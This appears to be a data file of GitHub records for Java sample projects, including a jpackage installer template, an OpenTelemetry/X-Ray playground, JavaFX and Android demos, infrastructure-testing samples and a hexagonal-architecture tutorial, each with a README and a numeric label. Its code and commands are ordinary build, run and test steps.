   2. **Windows only:** Install the [Wix 3 binaries](https://github.com/wixtoolset/wix3/releases/).
4. Clone/download this project.
5. Run `mvn clean install` from the root of the project to generate the `target\TestApp.dmg` or `target\TestApp.msi` installers.
   - The generated installer will include a version number in the file name.
   - For reference, here is a complete run log for [a successful run](docs/sample-run.md).

Because these builds use stripped-down JVM images, the [generated installers are in the 30-40mb range](https://github.com/wiverson/maven-jpackage-template/releases).
On MacOS you should [add signing to avoid error messages](https://github.com/wiverson/maven-jpackage-template/issues/49) related to the security system(s).

To [re]generate an installer, run...

`mvn clean install`

To do everything up until the actual installer generation (including generating the custom JVM)...

`mvn clean package`

To generate reports, including a check of whether you are using the current version[s] of your dependencies, run...

`mvn site`

...and open target/site/index.html to see the generated reports.

## Key Features

Here are a few cool things in this template:

- Only uses Java and Maven. No shell scripts required.
- Includes sample [GitHub Actions](https://github.com/wiverson/maven-jpackage-template/tree/main/.github/workflows) to build MacOS, Windows and Linux installers. These GitHub Actions are configured to use the Liberica JDK 18 with JavaFX to simplify the build process. If you prefer to use Azul Zulu, modify the distribution name to `distribution: 'zulu'` as described in the [Usage description of setup-java](https://github.com/actions/setup-java/blob/main/docs/advanced-usage.md#Zulu)
- Demonstrates setting the application icon
- Builds a .dmg on MacOS, .msi on Windows, and .deb on Linux, but can be easily tweaked to generate other jpackage-supported installers (e.g. .pkg)
- Includes a JavaFX demo to simplify getting started.
  - Just delete the JavaFX stuff if you are using Swing
- Template includes several examples of JavaFX / native desktop integration
  - Drag & drop with Finder / Explorer
  - Change the Dock icon dynamically on MacOS
  - Menu on the top for MacOS, in the window itself on Windows
  - Request user attention (bouncing dock icon) on MacOS
- Removing the code and the demonstration dependencies gets a "Hello World" build size closer to 30mb than 40mb.
- Java + Java modules are used to build a trimmed JVM ([a few thoughts on Java modules](https://changenode.com/articles/fomo-java-modules))
- The user application uses ordinary Maven dependencies and classpath to run the application
- Nice illustration of how to use jlink to build a slim JVM, point jpackage at that JVM, and still use the ordinary Maven-managed classpath for the application

Once you get started, you might find these lists of tutorials, tools, and libraries for [JavaFX](https://gist.github.com/wiverson/6c7f49819016cece906f0e8cea195ea2) and general [Java desktop integration](https://gist.github.com/wiverson/e9dfd73ca9a9a222b2d0a3d68ae3f129) helpful.

### Version Numbering

Usually you want a "marketing version" of an app as released to customers, and a "developer version" for use in internal testing. For example, to the end user it's just "Windows 11", but there are countless build numbers for all the different versions of Windows 11.

The end-user value is set in the pom.xml as `app.version`. This value is updated to use a GitHub environment variable when the installers are run on GitHub. If you look in `src/main/resources` you will see a version.txt file. This file has information in it that will be useful for creating a developer build UI. You might want to convert this to a properties file or a JSON file and display the information in your about UI.

Most projects will want to set up a coherent versioning strategy to manage both the user-visible and development build version numbers. This is usually project specific.

### Does this work with Apple Silicon aka M1/M2?

Yes, although as of this writing I don't believe there are GitHub Action runners that support M1. But building locally on my M1/M2 systems works great and generates native Apple Silicon builds.

### Does this support macOS signing, notarization, and stapling?

Yes, there is a GitHub Action and a Maven profile to assist with setting all of this up for macOS applications.
For more information, see the [documentation on getting MacOS signing/notarization/stapling](/docs/apple-sign-notarize.md) set up.

To get this working, you will need to:

1. Sign up for an Apple Developer account.
2. Add [four GitHub Secrets based on information from Apple](/docs/apple-sign-notarize.md).
3. Update the [build all installer GitHub Action yaml](https://github.com/wiverson/maven-jpackage-template/blob/6d4ef8a80a562f2d49ec41204927d07aa8990d25/.github/workflows/maven-build-all-installer.yml#L14)
4. Update the [pom.xml](https://github.com/wiverson/maven-jpackage-template/blob/6d4ef8a80a562f2d49ec41204927d07aa8990d25/pom.xml#L331).

### What about Linux?

The JavaFX builds include several other architectures, including aarch64 and arm32. In theory, you should be able to add those just like the other builds. I haven't tested it though, as I only use Linux for server-side stuff. Feel free to post in the [discussion](https://github.com/wiverson/maven-jpackage-template/discussions) section and also check the [Q&A](docs/qna.md) if you are using Linux.

### Can I Use this with Swing instead of JavaFX?

tl;dr absolutely. Just delete the JavaFX stuff, including the JavaFX module declarations in `pom.xml`, and add a Swing main class instead. If you are reasonably familiar with Maven this shouldn't be very hard to do.

I *highly* recommend [FlatLaf](https://www.formdev.com/flatlaf/) as a must for working with Swing in 2022. That look-and-feel plus designers such as the [IntelliJ GUI Designer](https://www.jetbrains.com/help/idea/gui-designer-basics.html) or [JFormDesigner](https://www.formdev.com/jformdesigner/) can work very well, arguably with an easier learning curve than JavaFX.

Suggested changes to the pom.xml for Swing:

1. Remove the javafx modules from the jvm.modules property
2. Remove the javafx.version property.
3. Remove the three org.openjfx dependencies
4. Remove the configuration/excludeGroupIds section from the maven-dependency-plugin
5.
Remove javafx-maven-plugin from the plugins list
6. Remove the modulePath declaration from the jtoolprovider-plugin execution/configuration

# Debugging

1. If the built app fails to run, make sure the JavaFX app runs as expected first by using the `mvn javafx:run` command. This will run the app in development mode locally, and you should see standard System.out debug lines appear in your console.
   - Many flavors of Linux fail to run here for a variety of reasons. Head over to the [discussions](https://github.com/wiverson/maven-jpackage-template/discussions) or perhaps consider your [consulting budget](https://changenode.com) or a [JavaFX support contract from Gluon](https://gluonhq.com/services/javafx-support/).
2. Check the Maven build logs (of course).
3. By default, the app will generate debug*****.log files containing the output from System.out. You can look at the main method of `BaseApplication.java` to see how this is done. For a production app, you would want to place these logs in the correct OS-specific location. On a Unix machine you can `tail -f` the log normally.

# Help

Problems? Make sure everything is installed and working right!

- Compiler not recognizing the --release option? Probably on an old JDK.
- Can't find jdeps or jpackage? Probably on an old JDK.
- Unrecognized option: --add-modules jdk.incubator.jpackage
  - Could be a left-over MAVEN_OPTS setting when you switched from Java 15 to Java 16/17
  - If you are still on Java 15, you may not have [MAVEN_OPTS set correctly](https://github.com/wiverson/maven-jpackage-template/issues/2).
- No certificate found matching [Developer ID Application: Company Name, Inc. (BXPXTXC35S)] using keychain [] -> Update the Developer ID info at the top of your build all installers and also in the macOS signing profile in the pom.xml.
- Getting errors about not being able to find JavaFX classes in your IDE? Make sure your IDE is pointing to the right JDK.
For example, on MacOS in IntelliJ, select File, Project Structure and make sure you have Liberica with JavaFX selected.

If you need consulting support, feel free to reach out at [ChangeNode.com](https://changenode.com/). I've helped several companies with Swing and JavaFX clean up/modernize their old apps to include updated look & feels, add MacOS sign/staple/notarization, or even in a few cases helped port the app to Spring Boot.

# Q&A

If you are using the template, browsing the [Q&A](docs/qna.md) is highly recommended.
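For the curious: the jlink/jpackage steps the template describes can be driven through the standard `java.util.spi.ToolProvider` API, which is the mechanism the jtoolprovider-plugin wraps. A minimal sketch of invoking jlink programmatically (the module list and output directory are illustrative, not the template's actual configuration):

```java
import java.util.spi.ToolProvider;

public class JlinkSketch {
    public static void main(String[] args) {
        // jlink is exposed as a ToolProvider since JDK 9 (jpackage since JDK 16),
        // so build tooling can call it in-process instead of shelling out.
        ToolProvider jlink = ToolProvider.findFirst("jlink")
                .orElseThrow(() -> new IllegalStateException("jlink not available in this JDK"));

        int exitCode = jlink.run(System.out, System.err,
                "--add-modules", "java.base,java.desktop", // trim to the modules you need
                "--strip-debug", "--no-header-files", "--no-man-pages",
                "--output", "target/trimmed-jvm");         // illustrative output directory
        System.out.println("jlink exit code: " + exitCode);
    }
}
```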
1
aws-observability/aws-otel-playground
Sample Application for the AWS X-Ray SDK with support for OpenTelemetry
null
# X-Ray Instrumentation Playground

This repository contains a toy application which exhibits a simple yet somewhat representative trace, including AWS SDK calls, a frontend and backend, and HTTP and gRPC. The same application is instrumented in several ways, allowing us to compare the experience when viewing traces for the different types of instrumentation.

Current instrumentation includes

- OpenTelemetry Auto Instrumentation + OpenTelemetry Collector
- X-Ray SDK Instrumentation + X-Ray Daemon
  - Does not instrument many libraries like gRPC and Lettuce

## Setting up AWS resources

The playground accesses various endpoints hosted on AWS. Feel free to skip this section to just see traces with local endpoints. To set up AWS resources you will need Terraform, available [here](https://www.terraform.io/downloads.html).

First, make sure you have configured AWS credentials using the AWS CLI as described [here](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html). You must also have [Java 11](https://www.oracle.com/java/technologies/javase-jdk11-downloads.html) installed to build the project.

From the root of the repository, to prepare the lambda deployment, run

```
$ ./gradlew :lambda-api:build
```

Then, navigate to the `scripts/terraform` directory and run

```
$ terraform init
$ terraform apply
```

This will take some time as it provisions resources. Note that this also generates `terraform.tfstate` files in the same directory. DO NOT LOSE THESE - without these files, Terraform will not be able to clean up after you are done with the resources. After it completes, three output values will be printed.
Open `docker-compose.yml` and find the four values under `#AWS Provisioned resources`. Change the values so

- `API_GATEWAY_ENDPOINT` is set to the output value `lambda_api_gateway_url`
- `ECS_ENDPOINT` is set to the output value `ecs_url`
- `EKS_ENDPOINT` is set to the output value `eks_fargate_url`
- `OTEL_ENDPOINT_PEER_SERVICE_MAPPING` - replace the keys for hello-lambda-api, ecs-backend, eks-backend with the domains for these three values

## Running

Make sure Docker is installed and run

`$ docker-compose up`

Access `http://localhost:9080/`. Then visit the X-Ray console, for example [here](https://ap-northeast-1.console.aws.amazon.com/xray/home?region=ap-northeast-1#/traces), and you should see multiple traces corresponding to the requests you made.

The app uses normal [AWS credentials](https://docs.aws.amazon.com/sdk-for-java/v2/developer-guide/setup-credentials.html). If you have trouble running after using the CLI to run `aws configure`, try setting the environment variables as described on that page, in particular `AWS_REGION`. Note that the `dynamodb-table` service only creates the table once, so it is normal for it to exit after creating the table.

If you see excessive deadline exceeded errors or the page doesn't respond properly, your Docker configuration may not have enough RAM. We recommend setting Docker to 4GB of RAM for a smooth experience.

If you make any code edits you would like to try out, first rebuild the Docker images locally with

`./gradlew jibDockerBuild`

and then rerun docker-compose.

## Cleaning up

If you provisioned AWS resources above, run `terraform destroy` to clean them up.

## How it works

The playground is composed of two observability components in addition to the business logic actually being monitored.
- [OpenTelemetry Java Agent](https://github.com/open-telemetry/opentelemetry-java-instrumentation)
- [OpenTelemetry Collector](https://github.com/open-telemetry/opentelemetry-collector-contrib)

The recommended way to get started for your app is to run the Docker image for the collector from [here](https://hub.docker.com/r/otel/opentelemetry-collector-contrib-dev). The collector listens on port 55680 for telemetry. You will need to provide a path to a configuration file with the `--config` parameter when running. This basic configuration will work for X-Ray.

```yaml
receivers:
  otlp:
    protocols:
      grpc:

exporters:
  logging:
    loglevel: info
  awsxray:
    local_mode: true

processors:
  memory_limiter:
    limit_mib: 100
    check_interval: 5s

service:
  pipelines:
    traces:
      processors:
        - memory_limiter
      receivers:
        - otlp
      exporters:
        - logging
        - awsxray
        # Feel free to add more exporters if you use e.g., Zipkin, Jaeger
```

If you have AWS credentials configured and both apps running on localhost, you will see traces in X-Ray if you issue any requests. If the collector cannot be accessed via localhost (e.g., in docker-compose), you may need to set the endpoint when starting your Java application using the `OTEL_OTLP_ENDPOINT` environment variable.

# License

This project is licensed under the MIT No Attribution License.
1
steveonjava/MaryHadALittleLambda
Sample project to demonstrate lambda features using JavaFX and the very finest retro 8-bit graphics.
null
MaryHadALittleLambda
====================

Sample project to demonstrate lambda features using JavaFX and the very finest retro 8-bit graphics.
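For reference, the kind of Java 8 lambda/stream feature the demo showcases looks like this (a generic, stand-alone taste, not code from the repo):

```java
import java.util.Arrays;
import java.util.List;
import java.util.stream.Collectors;

public class LambdaTaste {
    public static void main(String[] args) {
        List<String> animals = Arrays.asList("lamb", "chicken", "pig", "horse");

        // Lambdas + streams: declaratively filter and transform the list
        List<String> shortNames = animals.stream()
                .filter(name -> name.length() <= 4)
                .map(String::toUpperCase)
                .collect(Collectors.toList());

        System.out.println(shortNames); // [LAMB, PIG]
    }
}
```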
1
adam-hurwitz/Retrorecycler
A sample of a Retrofit network call displayed with a RecyclerAdapter.
null
# Retrorecycler ## _See [The Simplest Dagger2 Dependency Injection Sample App](https://android.jlelse.eu/the-simplest-dagger2-dependency-injection-sample-80a0eb60e33b)_ **A sample of a Retrofit network call displayed with a RecyclerAdapter.** [![retrorecycler hero image](https://adam-hurwitz.firebaseapp.com/Retrorecycler/retrorecycler-hero.png)](https://android.jlelse.eu/the-simplest-dagger2-dependency-injection-sample-80a0eb60e33b) <div align="center"> <a href="https://www.flickr.com/photos/soldiersmediacenter/16327158833/in/photolist-qSLXuv-o1GVxr-o1UweQ-o9L5ZX-nU9GL4-nJvGLb-5K7CDr-jMs8Bn-nUmVGU-ee6xR3-a8711K-8VJB2N-6JHmQK-nigFUx-o9M69k-stPUhw-nK4xuD-pQNRSY-o5eK2k-nFJQMo-nDJJic-mhSRmc-nYYTBN-nULwRJ-nQqGtt-mgYaV4-pT3Am3-4N4zVZ-o7V3P1-f66vm2-kfVCoy-owjBWP-nEp8HA-nMLf7t-rPiKXz-nJx4xY-f66Wga-o71MXx-sGNNFm-nRTZZ9-or3vmE-nqxPyW-o1eDqz-nJwP9D-o322zr-oW81Yy-e5CWsE-d4kMoJ-8cGajX-91CD6C/">Photo Credit</a>: U.S. Army</div>
1
florent37/Github
Sample project using Dagger2, RxJAva, RetroLambda and Carpaccio
null
# Github <a href="https://goo.gl/WXW8Dc"> <img alt="Android app on Google Play" src="https://developer.android.com/images/brand/en_app_rgb_wo_45.png" /> </a> This Github android sample application can give you a quick summary of your github repos. ![Alt sample](https://raw.githubusercontent.com/florent37/Github/master/screens/stats_small.png) ![Alt sample](https://raw.githubusercontent.com/florent37/Github/master/screens/events_small.png) #[Dagger2](google.github.io/dagger/) ```java @Singleton @Component(modules = {GithubModule.class, ContextModule.class}) public interface GithubComponent { GithubAPI githubApi(); RepoManager repoManager(); UserManager userManager(); void inject(MainActivity mainActivity); void inject(ListRepoFragment listRepoFragment); void inject(ListEventFragment listEventFragment); } ``` #[RxAndroid](https://github.com/ReactiveX/RxAndroid) & [RetroLambda](https://github.com/evant/gradle-retrolambda) Using the github API with Retrofit ```java githubAPI.userEvents(userManager.getUser().getLogin()) .observeOn(AndroidSchedulers.mainThread()) .onErrorReturn(null) .subscribe(events -> { if (events != null) carpaccio.mapList("event", events); }); ``` #[Carpaccio](https://github.com/florent37/Carpaccio) ```xml <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="wrap_content" android:gravity="center_vertical" android:orientation="vertical" android:paddingLeft="10dp" android:paddingRight="10dp"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:padding="10dp" android:tag=" setText($event.userName); font(Roboto-Medium.ttf); " android:textColor="#333" android:textSize="18sp" tools:text="UserName" /> <LinearLayout android:layout_width="match_parent" android:layout_height="wrap_content" android:orientation="horizontal"> <TextView 
android:layout_width="wrap_content" android:layout_height="wrap_content" android:padding="10dp" android:tag=" setText($event.action); font(Roboto-Regular.ttf);" tools:text="Starred" /> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:padding="10dp" android:tag=" setText($event.repoName); " android:textColor="#5bbce4" tools:text="UserName" /> </LinearLayout> </LinearLayout> ```
1
sparsick/infra-testing-talk
Code samples for my talk "Testing and Infrastructure" / "Testen von und mit Infrastruktur"
null
# infra-testing-talk

![Build Status](https://github.com/sparsick/infra-testing-talk/workflows/MavenBuild/badge.svg)

Here you can find the slides and the sample code of my talk "Testen von und mit Infrastruktur" ("Testing and Infrastructure").

## Simulate Infrastructure in Software Tests

All code samples for simulating infrastructure in software tests are in `infra-testing-demo-app`. The code samples are tested with Java 17 and Groovy 3.0.9, embedded in a Spring Boot 2.6.3 skeleton.

The following test libraries are used:

- JUnit 5.8.2 including JUnit 4 (JUnit Jupiter Vintage)
- AssertJ 3.21.0
- MockServer 5.11.2
- Wiremock 2.27.2
- Greenmail 1.6.5
- Testcontainers 1.14.3
- REST Assured 4.3.1
- Spock 2.0

### Tests against our own REST API

The test class `StarWarsMovieControllerITest` shows how to test our own REST API with Spring MVC and REST Assured. The test classes `RestAssuredJsonPathTest` and `RestAssuredXmlPathTest` demonstrate REST Assured's JsonPath and XmlPath features.

### Mock REST dependencies

The test classes `StarWarsClientMockserverTest`, `StarWarsClientWiremockTest` and `StarWarsClientMockserverGroovyTest` show how to mock dependencies on a REST API with MockServer or Wiremock. The test class `StarWarsClientVerifiedFakeTest` shows how to implement a verified-fake test.

### Testing interaction with e-mails

The test class `MailClientTest` shows how to test interaction with e-mails with Greenmail.

### Testing interaction with a database

The test classes `PersonRepositoryJUnit4/5/SpockTest` show how to test the repository logic, including the database that is used in production, with Testcontainers. The test classes `DBMigrationJUnit4/5Test` show how to test the database migration script inside my Maven build. The test class `PersonRepositoryJdbcUrlTestContainerTest` shows Testcontainers' JDBC URL feature. The test classes `*SinglwtonContainerTests` show how to implement the singleton container pattern.

## Infrastructure as Code Testing

All code samples for infrastructure as code testing are in `infrastructure-as-code-testing`. The code samples are tested with Bash, Ansible 2.9.6 and Docker 19.03.12.

The following test tools are used:

- Shellcheck 0.7.0
- Ansible-lint 4.2.0
- yamllint 1.23.0
- Serverspec 2.41.5
- Testinfra 5.2.1
- hadolint 1.18.0
- Container Structure Test 1.9.0
- Molecule 3.0.4
- terratest 0.35.3

### Setup Test Infrastructure

I prepared some Vagrantfiles for the setup of the test infrastructure, if necessary. The only prerequisites are that you have VirtualBox and Vagrant installed on your machine. It is tested with Vagrant 2.2.9. Then follow these steps:

1. Open a CLI and go to the location of the file `Vagrantfile`.
2. Call `vagrant up`. Vagrant will download the necessary image for VirtualBox. That will take some time.

Hint: Public and private keys can be generated with the following command: `ssh-keygen`

### Shell Scripts

The shell script sample is in `infrastructure-as-code-testing/shell`. This is also the location for the next CLI calls.

- Code quality check for the shell script: `shellcheck setup-svn.sh`

### Ansible Playbooks

The Ansible playbook samples are in `infrastructure-as-code-testing/ansible`. This is also the location for the next CLI calls.

- Code quality check for Ansible playbooks with Ansible-lint: `ansible-lint *.yml`
- Code quality check for YAML files in general with yamllint: `yamllint *yml`
- Running the Ansible playbooks against the test infrastructure (see the chapter 'Setup Test Infrastructure' above):

```
ansible-playbook -i inventories/test -u vagrant setup-db.yml  # MySQL setup
ansible-playbook -i inventories/test -u vagrant setup-app.yml # Apache Tomcat setup
```

- Running Serverspec tests against a provisioned VM: `rake spec`
- Running Testinfra tests against a provisioned VM:

```
py.test --connection=ansible --ansible-inventory inventories/test -v tests/*.py
```

#### Molecule

Molecule is an aggregator over some testing tools for Ansible roles. For running Molecule, go to `infrastructure-as-code-testing/ansible/roles/tomcat` and run `molecule test`.

### Docker Image

The Dockerfile sample is in `infrastructure-as-code-testing/docker`. This is also the location for the next CLI calls.

- Code quality check for the Dockerfile: `hadolint tomcat.df`
- Build the Docker image based on `tomcat.df`:

```
docker build -t sparsick/tomcat9 -f tomcat.df .
```

- Running the Container Structure Tests (prerequisite: the Docker image was built before):

```
container-structure-test test --image sparsick/tomcat9:latest --config tomcat-test.yaml
```

### Helm Charts

The code samples in `infrastructure-as-code-testing/helm-charts` are tested with Helm 3.8.1 and Minikube 1.25.2 (uses Kubernetes ).

#### Setup Test Infrastructure

```shell
cd infrastructure-as-code-testing/helm-charts
minikube start --addons=ingress
helm upgrade -i spring-boot-demo-instance spring-boot-demo -f local-values.yaml
```

Call `minikube ip` to find out the IP address of your Minikube cluster and add it to your `/etc/hosts`:

```shell
// /etc/hosts
192.168.49.2 spring-boot-demo.local
```

Then you can see the application in your browser at http://spring-boot-demo.local/hero

#### Helm Chart Linting

```shell
cd infrastructure-as-code-testing/helm-charts
helm lint spring-boot-demo -f local-values.yaml
```

#### Helm Chart Tests with Helm

The tests are located in `infrastructure-as-code-testing/helm-charts/spring-boot-demo/templates/tests`. If you want to run the tests, you need a running Minikube.

```shell
cd infrastructure-as-code-testing/helm-charts
helm test spring-boot-demo-instance
```

#### Helm Chart Tests with Terratest

The tests are located in `infrastructure-as-code-testing/helm-charts/test`. If you want to run the tests, you need a running Minikube and Golang on your machine.

```shell
cd infrastructure-as-code-testing/helm-charts/test
go mod tidy
go test . -v
```
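The singleton container pattern mentioned above amounts to one statically initialized resource shared by all test classes, instead of one container per test class. Stripped of Testcontainers specifics, a minimal sketch of the idea (class names here are illustrative, not the repository's actual classes):

```java
public class SharedContainerSketch {
    // Stand-in for an expensive container (e.g. a database); started once per JVM.
    static final class FakeContainer {
        private boolean running;
        void start() { running = true; }
        boolean isRunning() { return running; }
    }

    // The singleton pattern: eager static init, shared by every test class that
    // references CONTAINER. Testcontainers' sidecar would handle final cleanup.
    static final FakeContainer CONTAINER = new FakeContainer();
    static {
        CONTAINER.start();
    }

    public static void main(String[] args) {
        System.out.println("container running: " + CONTAINER.isRunning());
    }
}
```

Because class initialization happens exactly once, every test sees the same already-started container, which is what makes suites with many Testcontainers-based test classes fast.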
0
meistermeier/reactive-thymeleaf
Sample project for reactive server side rendering
java reactive thymeleaf
null
1
jvm-graphics-labs/hello-triangle
Simple sample showing a complete rendering of a triangle, in Java and Kotlin
globe java jogl kotlin opengl texture triangle
## Content:

- OpenGL 4:
  - Hello Triangle: <img src="./screenshots/triangle-gl4.png" height="36px">
    - [Simple Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl4/HelloTriangleSimple.java) using pure plain JOGL, without additional libraries
    - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl4/HelloTriangle.java)
    - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl4/helloTriangle.kt)
  - Hello Globe: <img src="./screenshots/texture-gl4.png" height="36px">
    - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl4/HelloGlobe.java)
    - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl4/helloGlobe.kt)
- OpenGL 3:
  - Hello Triangle: <img src="./screenshots/triangle-gl3.png" height="36px">
    - [Simple Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl3/HelloTriangleSimple.java) using pure plain JOGL, without additional libraries
    - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl3/HelloTriangle.java)
    - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl3/helloTriangle.kt)
  - Hello Texture: <img src="./screenshots/texture-gl3.png" height="36px">
    - [Java](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/java/gl3/HelloTexture.java)
    - [Kotlin](https://github.com/java-opengl-labs/helloTriangle/blob/master/src/main/kotlin/gl3/helloTexture.kt)
- GL injection: shows how to inject GL commands into a GL fifo from another thread (like the input listener):
  - [Java](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/java/gl3/GL_injection.java)
  - [Kotlin](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/kotlin/gl3/gl_injection.kt)
- Input into rendering: shows how to use a fifo stack to pipe events from the EDT (listener) into the rendering loop:
  - [Java](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/java/gl3/Input_into_rendering.java)
  - [Kotlin](https://github.com/java-opengl-labs/hello-triangle/blob/master/src/main/kotlin/gl3/input_into_rendering.kt)

## Quick start:

* clone & sync Gradle
* run it and enjoy the OpenGL acceleration on Java :sunglasses: (or even better, on Kotlin :scream:)

If you don't know how to use Gradle, follow this simple [tutorial](https://github.com/java-opengl-labs/hello-triangle/wiki/How-to-clone-the-project-and-get-it-running).

If you have any problem/question/doubt, do not hesitate to ask on the [jogl forums](http://forum.jogamp.org/) or [StackOverflow](http://stackoverflow.com/), or open an [issue here](https://github.com/elect86/helloTriangle/issues).

In case you find the above samples too complex or difficult to understand, I strongly suggest you start from scratch with a jogl tutorial, such as [modern-jogl-examples](https://github.com/java-opengl-labs/modern-jogl-examples). The original C tutorial it is ported from is one of the best, if not the best, out there.
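The GL-injection sample listed above relies on a simple mechanism: other threads (such as input listeners) enqueue commands into a fifo, and the thread that owns the GL context drains it once per frame. A JOGL-free sketch of that fifo (names are illustrative; the real samples enqueue actual GL calls):

```java
import java.util.concurrent.ConcurrentLinkedQueue;

public class GlFifoSketch {
    // Commands posted from other threads, e.g. the EDT input listener.
    static final ConcurrentLinkedQueue<Runnable> fifo = new ConcurrentLinkedQueue<>();

    static void inject(Runnable glCommand) {
        fifo.add(glCommand);
    }

    // Called once per frame, only on the thread owning the GL context,
    // so the injected commands run where GL calls are legal.
    static void drain() {
        Runnable cmd;
        while ((cmd = fifo.poll()) != null) cmd.run();
    }

    public static void main(String[] args) {
        StringBuilder log = new StringBuilder();
        inject(() -> log.append("glClearColor;"));
        inject(() -> log.append("glViewport;"));
        drain(); // commands run in posting order on the draining thread
        System.out.println(log); // glClearColor;glViewport;
    }
}
```

`ConcurrentLinkedQueue` is lock-free, so listener threads never block the render loop while posting.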
1
SvenWoltmann/hexagonal-architecture-java
This repository contains a sample Java REST application implemented according to hexagonal architecture.
hexagonal-architecture hexagonal-architectures java ports-and-adapters
# Hexagonal Architecture in Java Tutorial

[![Build](https://github.com/SvenWoltmann/hexagonal-architecture-java/actions/workflows/build.yml/badge.svg)](https://github.com/SvenWoltmann/hexagonal-architecture-java/actions/workflows/build.yml)
[![Coverage](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=coverage)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java)
[![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=sqale_rating)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java)
[![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=reliability_rating)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java)
[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=SvenWoltmann_hexagonal-architecture-java&metric=security_rating)](https://sonarcloud.io/dashboard?id=SvenWoltmann_hexagonal-architecture-java)

This repository contains a sample Java REST application implemented according to hexagonal architecture. It is part of the HappyCoders tutorial series on Hexagonal Architecture:

* [Part 1: Hexagonal Architecture - What Is It? Why Should You Use It?](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture/)
* [Part 2: Hexagonal Architecture with Java - Tutorial](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture-java/)
* [Part 3: Ports and Adapters Java Tutorial: Adding a Database Adapter](https://www.happycoders.eu/software-craftsmanship/ports-and-adapters-java-tutorial-db/)
* [Part 4: Hexagonal Architecture with Quarkus - Tutorial](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture-quarkus/)
* [Part 5: Hexagonal Architecture with Spring Boot - Tutorial](https://www.happycoders.eu/software-craftsmanship/hexagonal-architecture-spring-boot/)

# Branches

## `main`

In the `main` branch, you'll find the application implemented without an application framework. It's only using:

* [RESTEasy](https://resteasy.dev/) (implementing [Jakarta RESTful Web Services](https://jakarta.ee/specifications/restful-ws/)),
* [Hibernate](https://hibernate.org/) (implementing [Jakarta Persistence API](https://jakarta.ee/specifications/persistence/)), and
* [Undertow](https://undertow.io/) as a lightweight web server.

## `without-jpa-adapters`

In the `without-jpa-adapters` branch, you'll find the application implemented without an application framework and without JPA adapters. It's only using RESTEasy and Undertow.

## `with-quarkus`

In the `with-quarkus` branch, you'll find an implementation using [Quarkus](https://quarkus.io/) as application framework.

## `with-spring`

In the `with-spring` branch, you'll find an implementation using [Spring](https://spring.io/) as application framework.

# Architecture Overview

The source code is separated into four modules:

* `model` - contains the domain model
* `application` - contains the domain services and the ports of the hexagon
* `adapters` - contains the REST, in-memory and JPA adapters
* `boostrap` - contains the configuration and bootstrapping logic

The following diagram shows the hexagonal architecture of the application along with the source code modules:

![Hexagonal Architecture Modules](doc/hexagonal-architecture-modules.png)

The `model` module is not represented as a hexagon because it is not defined by the Hexagonal Architecture. Hexagonal Architecture leaves open what happens inside the application hexagon.

# How to Run the Application

The easiest way to run the application is to start the `main` method of the `Launcher` class (you'll find it in the `boostrap` module) from your IDE.

You can use one of the following VM options to select a persistence mechanism:

* `-Dpersistence=inmemory` to select the in-memory persistence option (default)
* `-Dpersistence=mysql` to select the MySQL option

If you selected the MySQL option, you will need a running MySQL database. The easiest way to start one is to use the following Docker command:

```shell
docker run --name hexagon-mysql -d -p3306:3306 \
  -e MYSQL_DATABASE=shop -e MYSQL_ROOT_PASSWORD=test mysql:8.1
```

The connection parameters for the database are hardcoded in `RestEasyUndertowShopApplication.initMySqlAdapter()`. If you are using the Docker container as described above, you can leave the connection parameters as they are. Otherwise, you may need to adjust them.

# Example Curl Commands

The following `curl` commands assume that you have installed `jq`, a tool for pretty-printing JSON strings.

## Find Products

The following queries return one and two results, respectively:

```shell
curl localhost:8080/products/?query=plastic | jq
curl localhost:8080/products/?query=monitor | jq
```

The response of the second query looks like this:

```json
[
  {
    "id": "K3SR7PBX",
    "name": "27-Inch Curved Computer Monitor",
    "price": {
      "currency": "EUR",
      "amount": 159.99
    },
    "itemsInStock": 24081
  },
  {
    "id": "Q3W43CNC",
    "name": "Dual Monitor Desk Mount",
    "price": {
      "currency": "EUR",
      "amount": 119.9
    },
    "itemsInStock": 1079
  }
]
```

## Get a Cart

To show the cart of user 61157 (this cart is empty when you begin):

```shell
curl localhost:8080/carts/61157 | jq
```

The response should look like this:

```json
{
  "lineItems": [],
  "numberOfItems": 0,
  "subTotal": null
}
```

## Adding Products to a Cart

Each of the following commands adds a product to the cart and returns the contents of the cart after the product is added (note that on Windows, you have to replace the single quotes with double quotes):

```shell
curl -X POST 'localhost:8080/carts/61157/line-items?productId=TTKQ8NJZ&quantity=20' | jq
curl -X POST 'localhost:8080/carts/61157/line-items?productId=K3SR7PBX&quantity=2' | jq
curl -X POST 'localhost:8080/carts/61157/line-items?productId=Q3W43CNC&quantity=1' | jq
curl -X POST 'localhost:8080/carts/61157/line-items?productId=WM3BPG3E&quantity=3' | jq
```

